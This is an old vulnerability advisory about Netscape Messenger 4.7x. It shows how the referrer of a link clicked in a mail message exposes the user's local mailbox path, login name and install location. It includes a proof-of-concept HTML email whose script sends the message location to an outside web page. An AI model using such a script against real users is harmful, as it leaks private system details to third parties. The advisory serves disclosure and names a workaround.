COMMAND
Netscape Messanger
SYSTEMS AFFECTED
Netscape 4.7x All Platforms
PROBLEM
'3APA3A' found following. There are known bugs in Netscape which
require information on user's files location. This bug is not
serious one, but it allows to get this location.
Netscape Messanger uses internal protocol called mailbox://. The
format of mailbox URI is
mailbox://full_path_to_user_folder?ID=some_message_d&number=somenumber
this URI contains full path to user's mailbox which usually
contains user's login name and in case of Windows 9x - the path to
Netscape installation. It's impossible to determine this location
from javascript inside e-mail message, because Netscape hides
document.location from javascript.
It's possible to retrieve mailbox:// URI of the message. E.g.,
it's possible to retrieve mailbox location, user's system login
and in some cases path to Netscape installation.
When link invoked from message, Netscape sets "document.referrer"
property to URI of the message contained this link. Javascript
on the target page is able to retrieve this property and pass it
to any location together with IP of calling machine.
If you read this message with Netscape Messanger you can simply
click reference
http://www.security.nnov.ru/files/nsdemo.asp
to see your mailbox location or you can force Netscape user to
open this page with message like this:
From: 3APA3A
To: 3APA3A
Subject: Test your Netscape
Content-Type: text/html
<html><script> window.open('http://www.security.nnov.ru/files/nsdemo.asp?'+escape(document.location));
</script>
<A HREF="http://www.security.nnov.ru/files/nsdemo.asp"> http://www.security.nnov.ru/files/nsdemo.asp</A>
</html>
This vulnerability only affects the users local (on the client
machine) mailbox. If a user keeps his mail on an IMAP server, the
the referer will show up as an IMAP:// url.
SOLUTION
Netscape was contacted May, 30 2001. No feedback were given.
Workaround: Don't use POP3, and keep your mail on an IMAP server.